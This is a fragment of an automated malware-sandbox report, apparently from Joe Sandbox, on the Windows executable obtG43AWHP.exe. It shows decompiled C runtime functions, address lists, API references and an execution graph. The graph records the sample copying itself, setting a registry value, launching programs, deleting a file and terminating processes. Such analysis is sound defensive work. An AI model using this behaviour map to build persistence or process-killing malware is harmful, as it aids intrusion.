							_t40 = _t56 + _t16;
							__eflags = _t40 - 0x400;
							if(_t40 > 0x400) {
								_t41 = E030089C5(_t54, _t56, MultiByteToWideChar, _t40);
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xdddd;
									goto L11;
								}
							} else {
								E03009200(_t40);
								_t41 = _t62;
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xcccc;
									L11:
									_t41 =  &(_t41[4]);
									__eflags = _t41;
								}
							}
							_t47 = _t41;
						}
					}
					__eflags = _t47;
					if(_t47 == 0) {
						goto L3;
					} else {
						E03006C50(_t47, 0, _t56 + _t56);
						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
						__eflags = _t37;
						if(_t37 != 0) {
							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
						}
						E0300816A(_t47);
						_t33 = _v12;
					}
				} else {
					L3:
					_t33 = 0;
				}
				_pop(_t57);
				_pop(_t60);
				_pop(_t48);
				return E03006BA0(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
			}






















    0x030083b7
    0x030083bc
    0x030083bd
    0x030083be
    0x030083c5
    0x030083c9
    0x030083cd
    0x030083d3
    0x030083dd
    0x030083dd
    0x03008403
    0x03008407
    0x0300840d
    0x0300840f
    0x03008415
    0x03008417
    0x03008417
    0x0300841b
    0x03008420
    0x03008436
    0x0300843c
    0x0300843e
    0x03008440
    0x00000000
    0x03008440
    0x03008422
    0x03008422
    0x03008427
    0x03008429
    0x0300842b
    0x0300842d
    0x03008446
    0x03008446
    0x03008446
    0x03008446
    0x0300842b
    0x03008449
    0x03008449
    0x03008415
    0x0300844b
    0x0300844d
    0x00000000
    0x0300844f
    0x03008456
    0x0300846b
    0x0300846d
    0x0300846f
    0x0300847f
    0x0300847f
    0x03008483
    0x03008488
    0x0300848b
    0x03008409
    0x03008409
    0x03008409
    0x03008409
    0x0300848f
    0x03008490
    0x03008491
    0x0300849d

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,030084CC,?,00000000,?), ref: 03008401
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0300846B
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 03008479
    • __freea.LIBCMT ref: 03008483
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03004BD6, Relevance: 6.0, APIs: 4, Instructions: 50
    C-Code - Quality: 58%
    			E03004BD6() {
				signed int _t3;
				long _t4;
				struct _CRITICAL_SECTION* _t5;
				struct _CRITICAL_SECTION* _t14;
				signed int* _t17;
				struct _CRITICAL_SECTION** _t18;

				_t3 =  *0x300b1c0; // 0x3
				if(_t3 != 0xffffffff) {
					__imp__DecodePointer( *0x300c648, _t3);
					 *_t3();
					 *0x300b1c0 =  *0x300b1c0 | 0xffffffff;
				}
				_t4 =  *0x300b1c4; // 0x14
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
					 *0x300b1c4 =  *0x300b1c4 | 0xffffffff;
				}
				_t17 = 0x300bbf0;
				do {
					_t14 =  *_t17;
					if(_t14 != 0 && _t17[1] != 1) {
						DeleteCriticalSection(_t14);
						E03006891(_t14);
						 *_t17 =  *_t17 & 0x00000000;
					}
					_t17 =  &(_t17[2]);
				} while (_t17 < 0x300bd10);
				_t18 = 0x300bbf0;
				do {
					_t5 =  *_t18;
					if(_t5 != 0 && _t18[1] == 1) {
						DeleteCriticalSection(_t5);
					}
					_t18 =  &(_t18[2]);
				} while (_t18 < 0x300bd10);
				return _t5;
			}









    0x03004bd6
    0x03004bde
    0x03004be7
    0x03004bed
    0x03004bef
    0x03004bef
    0x03004bf6
    0x03004bfe
    0x03004c01
    0x03004c07
    0x03004c07
    0x03006d68
    0x03006d6e
    0x03006d6e
    0x03006d72
    0x03006d7b
    0x03006d7e
    0x03006d83
    0x03006d86
    0x03006d87
    0x03006d8a
    0x03006d92
    0x03006d98
    0x03006d98
    0x03006d9c
    0x03006da5
    0x03006da5
    0x03006da7
    0x03006daa
    0x03006db4

    APIs
    • DecodePointer.KERNEL32(00000003,03004FFF,?,03002D9E), ref: 03004BE7
    • TlsFree.KERNEL32(00000014,03004FFF,?,03002D9E), ref: 03004C01
    • DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • DeleteCriticalSection.KERNEL32(00000014,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006DA5
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03006097, Relevance: 6.0, APIs: 4, Instructions: 47
    C-Code - Quality: 81%
    			E03006097(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x30098d8);
				E03005030(__ebx, __edi, __esi);
				_t31 = E03004D40(__ebx, __edx, _t35);
				_t15 =  *0x300b970; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E03006E8E(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x300b878; // 0x12811f8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x300b450;
								if(__eflags != 0) {
									E03006891(_t33);
								}
							}
						}
						_t21 =  *0x300b878; // 0x12811f8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x300b878; // 0x12811f8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E03006132();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E0300420B(_t29, _t38);
				}
				return E03005075(_t33);
			}









    0x03006097
    0x03006097
    0x03006097
    0x03006097
    0x03006099
    0x0300609e
    0x030060a8
    0x030060aa
    0x030060b2
    0x030060d3
    0x030060d9
    0x030060dd
    0x030060e0
    0x030060e3
    0x030060e9
    0x030060eb
    0x030060ed
    0x030060f6
    0x030060f8
    0x030060fa
    0x03006100
    0x03006103
    0x03006108
    0x03006100
    0x030060f8
    0x03006109
    0x0300610e
    0x03006111
    0x03006117
    0x0300611b
    0x0300611b
    0x03006121
    0x03006128
    0x030060ba
    0x030060ba
    0x030060ba
    0x030060bd
    0x030060bf
    0x030060c1
    0x030060c3
    0x030060c8
    0x030060d0

    APIs
    • __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • InterlockedIncrement.KERNEL32(012811F8), ref: 0300611B
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03004CC7, Relevance: 6.0, APIs: 4, Instructions: 45
    C-Code - Quality: 58%
    			E03004CC7(void* __ebx) {
				void* __edi;
				void* __esi;
				long _t3;
				long* _t7;
				void* _t8;
				long _t11;
				long _t18;
				long* _t19;

				_t3 = GetLastError();
				_push( *0x300b1c0);
				_t18 = _t3;
				_t19 =  *((intOrPtr*)(E03004BA2()))();
				if(_t19 == 0) {
					_t7 = E03006933(1, 0x214);
					_t19 = _t7;
					if(_t19 != 0) {
						__imp__DecodePointer( *0x300c644,  *0x300b1c0, _t19);
						_t8 =  *_t7();
						_t22 = _t8;
						if(_t8 == 0) {
							E03006891(_t19);
							_t19 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t19);
							E03004C13(__ebx, _t18, _t19, _t22);
							_t11 = GetCurrentThreadId();
							_t19[1] = _t19[1] | 0xffffffff;
							 *_t19 = _t11;
						}
					}
				}
				SetLastError(_t18);
				return _t19;
			}











    0x03004ccb
    0x03004cd1
    0x03004cd7
    0x03004ce0
    0x03004ce4
    0x03004ced
    0x03004cf2
    0x03004cf8
    0x03004d07
    0x03004d0d
    0x03004d0f
    0x03004d11
    0x03004d2c
    0x03004d32
    0x03004d32
    0x03004d13
    0x03004d13
    0x03004d15
    0x03004d16
    0x03004d1d
    0x03004d23
    0x03004d27
    0x03004d27
    0x03004d11
    0x03004cf8
    0x03004d35
    0x03004d3f

    APIs
    • GetLastError.KERNEL32(?,?,03003EAA,03002BF3), ref: 03004CCB
      • Part of subcall function 03004BA2: TlsGetValue.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BAB
      • Part of subcall function 03004BA2: DecodePointer.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BBD
      • Part of subcall function 03004BA2: TlsSetValue.KERNEL32(00000000,?,03004CDE,?,03003EAA,03002BF3), ref: 03004BCC
    • SetLastError.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D35
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D07
    • GetCurrentThreadId.KERNEL32(?,03003EAA,03002BF3), ref: 03004D1D
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03004C13, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
    C-Code - Quality: 91%
    			E03004C13(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x3009848);
				E03005030(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x3001c10;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x300b450;
				E03006E8E(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E03004CB5();
				E03006E8E(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x300bbb8; // 0x300bae0
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E03006558( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E03005075(E03004CBE());
			}







    0x03004c13
    0x03004c13
    0x03004c15
    0x03004c1a
    0x03004c24
    0x03004c2a
    0x03004c2d
    0x03004c34
    0x03004c3b
    0x03004c3e
    0x03004c41
    0x03004c48
    0x03004c4f
    0x03004c58
    0x03004c5e
    0x03004c65
    0x03004c6b
    0x03004c72
    0x03004c79
    0x03004c7f
    0x03004c82
    0x03004c85
    0x03004c8a
    0x03004c8c
    0x03004c91
    0x03004c91
    0x03004c97
    0x03004c9d
    0x03004cae

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300656A
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006577
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006584
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006591
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300659E
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065BA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3120 Parent PID: 3072

    Execution Graph

    Execution Coverage:1.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:6.6%
    Total number of Nodes:622
    Total number of Limit Nodes:5

    Graph

    %3 16930 418c78 16957 405adc GetModuleHandleA 16930->16957 16935 418cf0 16977 418750 16935->16977 16939 418cc6 16939->16935 16944 4029a4 36 API calls 16939->16944 16946 418ce2 16944->16946 16948 418cea DeleteFileA 16946->16948 16948->16935 16952 418570 43 API calls 16954 418d04 16952->16954 16953 418d35 ResumeThread 16953->16954 16954->16952 16954->16953 16955 4189e8 3 API calls 16954->16955 17061 4189e8 PeekMessageA 16954->17061 17067 418590 SuspendThread 16954->17067 16956 418d25 Sleep 16955->16956 16956->16954 16958 405b0f 16957->16958 17073 403b78 16958->17073 16961 402944 GetCommandLineA 17307 402858 16961->17307 16963 402858 34 API calls 16964 402968 16963->16964 16964->16963 16965 40297f 16964->16965 16966 403e88 11 API calls 16965->16966 16967 402994 16966->16967 16967->16935 16968 4029a4 16967->16968 16969 403e88 11 API calls 16968->16969 16970 4029b8 16969->16970 16971 4029bc GetModuleFileNameA 16970->16971 16972 4029da GetCommandLineA 16970->16972 16973 403f78 25 API calls 16971->16973 16976 4029e1 16972->16976 16975 4029d8 16973->16975 16974 402858 34 API calls 16974->16976 16975->16939 16976->16974 16976->16975 16978 418758 16977->16978 16979 402944 35 API calls 16978->16979 16981 418776 16979->16981 16980 4187a4 16983 4029a4 36 API calls 16980->16983 16981->16980 16982 4029a4 36 API calls 16981->16982 16985 41878d 16982->16985 16984 4187bf 16983->16984 17339 407138 16984->17339 16987 418795 ShellExecuteA 16985->16987 17329 403d1c 16987->17329 16990 4188db 16993 4188e0 16990->16993 16996 41891b 16990->16996 16991 4187d2 17343 417d84 16991->17343 16994 406ffc 25 API calls 16993->16994 17001 4188f1 16994->17001 17397 403eac 16996->17397 17004 4029a4 36 API calls 17001->17004 17006 418904 17004->17006 17005 417d84 27 API calls 17007 4187ff 17005->17007 17008 41890c ShellExecuteA 17006->17008 17009 406efc 25 API calls 17007->17009 17010 403d1c 7 API calls 17008->17010 17011 418810 17009->17011 17010->16996 17374 4185e8 17011->17374 17014 4029a4 36 API calls 17015 418823 17014->17015 17016 406efc 25 API calls 17015->17016 17017 41882e 17016->17017 17018 406efc 25 API calls 17017->17018 17019 41883f 17018->17019 17020 417d84 27 API calls 17019->17020 17021 41884a 17020->17021 17022 4188aa 17021->17022 17023 418855 17021->17023 17025 406ffc 25 API calls 17022->17025 17384 406ffc 17023->17384 17026 4188bb 17025->17026 17031 4188cc ShellExecuteA 17026->17031 17028 4029a4 36 API calls 17029 418878 17028->17029 17388 404208 17029->17388 17032 4188d6 17031->17032 17033 403d1c 7 API calls 17032->17033 17033->16990 17036 418a14 17530 417828 17036->17530 17038 418a3d 17039 406efc 25 API calls 17038->17039 17040 418a4c 17039->17040 17534 417750 17040->17534 17043 406efc 25 API calls 17044 418a63 17043->17044 17540 4177bc 17044->17540 17046 418a6d 17047 418a78 17046->17047 17048 418aa4 Sleep 17046->17048 17546 417318 17047->17546 17048->17046 17051 403edc 25 API calls 17052 418a94 17051->17052 17053 403eac 11 API calls 17052->17053 17054 418aca 17053->17054 17055 418540 17054->17055 17645 403e44 17055->17645 17057 418558 17058 418b90 17057->17058 17059 403e44 26 API calls 17058->17059 17060 418ba8 17059->17060 17060->16954 17062 418a03 TranslateMessage DispatchMessageA 17061->17062 17063 418a0f Sleep 17061->17063 17062->17063 17064 418570 17063->17064 17652 41839c 17064->17652 17068 4185c3 17067->17068 17697 418560 17068->17697 17071 4185e3 17071->16954 17072 4185cc OpenProcess TerminateProcess 17072->17071 17074 403bab 17073->17074 17077 403b18 17074->17077 17078 403b54 17077->17078 17079 403b27 17077->17079 17078->16961 17079->17078 17083 405824 17079->17083 17089 404d84 17079->17089 17093 402670 17079->17093 17084 405834 17083->17084 17085 405865 17083->17085 17084->17085 17099 404dcc 17084->17099 17085->17079 17087 405854 LoadStringA 17104 403f78 17087->17104 17090 404db0 17089->17090 17091 404d94 GetModuleFileNameA 17089->17091 17090->17079 17148 404fc0 GetModuleFileNameA RegOpenKeyExA 17091->17148 17094 402675 17093->17094 17095 402688 17093->17095 17187 40209c 17094->17187 17095->17079 17096 40267b 17096->17095 17097 402778 11 API calls 17096->17097 17097->17095 17100 404df3 17099->17100 17103 404dd6 17099->17103 17100->17087 17101 404d84 30 API calls 17102 404dec 17101->17102 17102->17087 17103->17100 17103->17101 17109 403f4c 17104->17109 17107 403f88 17114 403e88 17107->17114 17110 403f74 17109->17110 17111 403f50 17109->17111 17110->17107 17112 402670 25 API calls 17111->17112 17113 403f5d 17112->17113 17113->17107 17115 403ea9 17114->17115 17116 403e8e 17114->17116 17115->17085 17116->17115 17118 402690 17116->17118 17119 402695 17118->17119 17120 4026a8 17118->17120 17119->17120 17122 402778 17119->17122 17120->17115 17123 40272c 17122->17123 17124 402751 17123->17124 17128 405a90 17123->17128 17136 402720 17124->17136 17129 405ac5 TlsGetValue 17128->17129 17130 405a9f 17128->17130 17131 405aaa 17129->17131 17132 405acf 17129->17132 17130->17124 17139 405a4c 17131->17139 17132->17124 17134 405aaf TlsGetValue 17135 405abe 17134->17135 17135->17124 17145 403df4 17136->17145 17140 405a52 17139->17140 17141 405a38 LocalAlloc 17140->17141 17144 405a76 17140->17144 17142 405a72 17141->17142 17143 405a82 TlsSetValue 17142->17143 17142->17144 17143->17144 17144->17134 17146 403d1c 7 API calls 17145->17146 17147 40272b 17146->17147 17147->17120 17149 405003 RegOpenKeyExA 17148->17149 17150 405043 17148->17150 17149->17150 17151 405021 RegOpenKeyExA 17149->17151 17166 404e08 GetModuleHandleA 17150->17166 17151->17150 17153 4050cc lstrcpyn GetThreadLocale GetLocaleInfoA 17151->17153 17157 4051e6 17153->17157 17158 405103 17153->17158 17155 405088 RegQueryValueExA 17156 4050a6 RegCloseKey 17155->17156 17156->17090 17157->17090 17158->17157 17159 405113 lstrlen 17158->17159 17161 40512b 17159->17161 17161->17157 17162 405150 lstrcpyn LoadLibraryExA 17161->17162 17163 405178 17161->17163 17162->17163 17163->17157 17164 405182 lstrcpyn LoadLibraryExA 17163->17164 17164->17157 17165 4051b4 lstrcpyn LoadLibraryExA 17164->17165 17165->17157 17167 404e30 GetProcAddress 17166->17167 17168 404e70 17166->17168 17167->17168 17171 404e41 17167->17171 17169 404f92 RegQueryValueExA 17168->17169 17180 404ea3 17168->17180 17183 404df4 17168->17183 17169->17155 17169->17156 17170 404eb6 lstrcpyn 17177 404ed4 17170->17177 17171->17168 17173 404e57 lstrcpyn 17171->17173 17173->17169 17174 404f7e lstrcpyn 17174->17169 17175 404df4 CharNextA 17175->17177 17177->17169 17177->17174 17177->17175 17179 404ef3 lstrcpyn FindFirstFileA 17177->17179 17178 404df4 CharNextA 17178->17180 17179->17169 17181 404f1e FindClose lstrlen 17179->17181 17180->17169 17180->17170 17181->17169 17182 404f3d lstrcpyn lstrlen 17181->17182 17182->17177 17185 404dfc 17183->17185 17184 404e07 17184->17169 17184->17178 17185->17184 17186 404df6 CharNextA 17185->17186 17186->17185 17188 4020b0 17187->17188 17189 4020b5 17187->17189 17198 4019b0 RtlInitializeCriticalSection 17188->17198 17191 4020e2 RtlEnterCriticalSection 17189->17191 17192 4020ec 17189->17192 17197 4020c1 17189->17197 17191->17192 17192->17197 17205 401fa8 17192->17205 17195 40220d RtlLeaveCriticalSection 17196 402217 17195->17196 17196->17096 17197->17096 17199 4019d4 RtlEnterCriticalSection 17198->17199 17200 4019de 17198->17200 17199->17200 17201 4019fc LocalAlloc 17200->17201 17202 401a16 17201->17202 17203 401a5b RtlLeaveCriticalSection 17202->17203 17204 401a65 17202->17204 17203->17204 17204->17189 17209 401fb8 17205->17209 17206 401fe4 17210 402008 17206->17210 17216 401dbc 17206->17216 17209->17206 17209->17210 17211 401f1c 17209->17211 17210->17195 17210->17196 17220 401770 17211->17220 17213 401f2c 17214 401f39 17213->17214 17229 401e90 17213->17229 17214->17209 17217 401dda 17216->17217 17218 401e11 17216->17218 17217->17210 17218->17217 17271 401d0c 17218->17271 17226 40178c 17220->17226 17221 401796 17236 40165c 17221->17236 17224 4017a2 17224->17213 17226->17221 17226->17224 17227 4017e7 17226->17227 17240 4014c8 17226->17240 17248 4013c4 17226->17248 17252 4015a4 17227->17252 17259 401e44 17229->17259 17232 4013c4 LocalAlloc 17235 401eb4 17232->17235 17233 401ebc 17233->17214 17235->17233 17263 401be8 17235->17263 17238 4016a2 17236->17238 17237 4016d2 17237->17224 17238->17237 17239 4016be VirtualAlloc 17238->17239 17239->17237 17239->17238 17241 4014d7 VirtualAlloc 17240->17241 17243 401527 17241->17243 17244 401504 17241->17244 17243->17226 17256 40137c 17244->17256 17247 401514 VirtualFree 17247->17243 17249 4013e0 17248->17249 17250 40137c LocalAlloc 17249->17250 17251 401426 17250->17251 17251->17226 17253 4015d3 17252->17253 17254 40162c 17253->17254 17255 401600 VirtualFree 17253->17255 17254->17224 17255->17253 17257 401324 LocalAlloc 17256->17257 17258 401387 17257->17258 17258->17243 17258->17247 17260 401e56 17259->17260 17261 401e4d 17259->17261 17260->17232 17261->17260 17268 401c18 17261->17268 17264 401c05 17263->17264 17265 401bf6 17263->17265 17264->17233 17266 401dbc 9 API calls 17265->17266 17267 401c03 17266->17267 17267->17233 17269 40222c 9 API calls 17268->17269 17270 401c39 17269->17270 17270->17260 17272 401d22 17271->17272 17273 401d61 17272->17273 17274 401d4d 17272->17274 17283 401daa 17272->17283 17275 401924 3 API calls 17273->17275 17284 401924 17274->17284 17277 401d5f 17275->17277 17278 401be8 9 API calls 17277->17278 17277->17283 17280 401d85 17278->17280 17279 401d9f 17299 401434 17279->17299 17280->17279 17294 401c3c 17280->17294 17283->17217 17285 40194a 17284->17285 17293 4019a3 17284->17293 17303 4016f0 17285->17303 17288 4013c4 LocalAlloc 17289 401967 17288->17289 17290 4015a4 VirtualFree 17289->17290 17291 40197e 17289->17291 17290->17291 17292 401434 LocalAlloc 17291->17292 17291->17293 17292->17293 17293->17277 17295 401c41 17294->17295 17296 401c4f 17294->17296 17297 401c18 9 API calls 17295->17297 17296->17279 17298 401c4e 17297->17298 17298->17279 17300 40143f 17299->17300 17301 40145a 17300->17301 17302 40137c LocalAlloc 17300->17302 17301->17283 17302->17301 17305 401727 17303->17305 17304 401767 17304->17288 17305->17304 17306 401741 VirtualFree 17305->17306 17306->17305 17308 40286a 17307->17308 17309 402884 17308->17309 17310 402862 CharNextA 17308->17310 17311 4028d3 17309->17311 17312 40288e CharNextA 17309->17312 17313 4028bf CharNextA 17309->17313 17316 4028b5 CharNextA 17309->17316 17317 402898 CharNextA 17309->17317 17310->17308 17323 404478 17311->17323 17312->17309 17313->17309 17315 40293b 17315->16964 17316->17309 17317->17309 17318 4028e8 CharNextA 17320 4028dc 17318->17320 17319 402920 CharNextA 17319->17320 17320->17315 17320->17318 17320->17319 17321 402916 CharNextA 17320->17321 17322 4028f2 CharNextA 17320->17322 17321->17320 17322->17320 17325 404485 17323->17325 17328 4044b5 17323->17328 17324 403e88 11 API calls 17327 404491 17324->17327 17326 403f4c 25 API calls 17325->17326 17325->17327 17326->17328 17327->17320 17328->17324 17331 403d35 17329->17331 17330 403d54 17401 403c90 17330->17401 17331->17330 17332 403d65 17331->17332 17335 403da6 17332->17335 17336 403da0 FreeLibrary 17332->17336 17334 403d5e 17334->17332 17337 403ddb 17335->17337 17338 403dd3 ExitProcess 17335->17338 17336->17335 17340 407148 17339->17340 17341 407169 17340->17341 17407 406d40 17340->17407 17341->16990 17341->16991 17473 404348 17343->17473 17346 404478 25 API calls 17347 417dba 17346->17347 17348 417dca ExpandEnvironmentStringsA 17347->17348 17349 406efc 25 API calls 17348->17349 17350 417dda 17349->17350 17351 403edc 25 API calls 17350->17351 17352 417de4 17351->17352 17353 403e88 11 API calls 17352->17353 17354 417df9 17353->17354 17355 4186d0 17354->17355 17356 4186e4 17355->17356 17475 40760c 17356->17475 17360 418705 17361 4029a4 36 API calls 17360->17361 17362 41871a 17361->17362 17363 418722 CopyFileA 17362->17363 17364 418735 17363->17364 17365 403eac 11 API calls 17364->17365 17366 418742 17365->17366 17367 406efc 17366->17367 17368 406f0b 17367->17368 17369 406f24 17368->17369 17370 406f2d 17368->17370 17371 403e88 11 API calls 17369->17371 17373 4043a8 25 API calls 17370->17373 17372 406f2b 17371->17372 17372->17005 17373->17372 17375 418602 17374->17375 17376 41860a RegOpenKeyExA 17375->17376 17377 41863a 17376->17377 17378 41865c RegSetValueExA RegCloseKey 17377->17378 17379 41867c 17378->17379 17380 403e88 11 API calls 17379->17380 17381 418684 17380->17381 17382 403eac 11 API calls 17381->17382 17383 418691 17382->17383 17383->17014 17385 40700c 17384->17385 17386 403f78 25 API calls 17385->17386 17387 407014 17386->17387 17387->17028 17389 404219 17388->17389 17390 40423f 17389->17390 17391 404256 17389->17391 17392 404478 25 API calls 17390->17392 17393 403f4c 25 API calls 17391->17393 17394 40424c 17392->17394 17393->17394 17395 404287 17394->17395 17396 403edc 25 API calls 17394->17396 17396->17395 17399 403eb2 17397->17399 17398 403ed8 17398->17036 17399->17398 17400 402690 11 API calls 17399->17400 17400->17399 17402 403cf1 17401->17402 17404 403c9a GetStdHandle WriteFile GetStdHandle WriteFile 17401->17404 17405 403cfa MessageBoxA 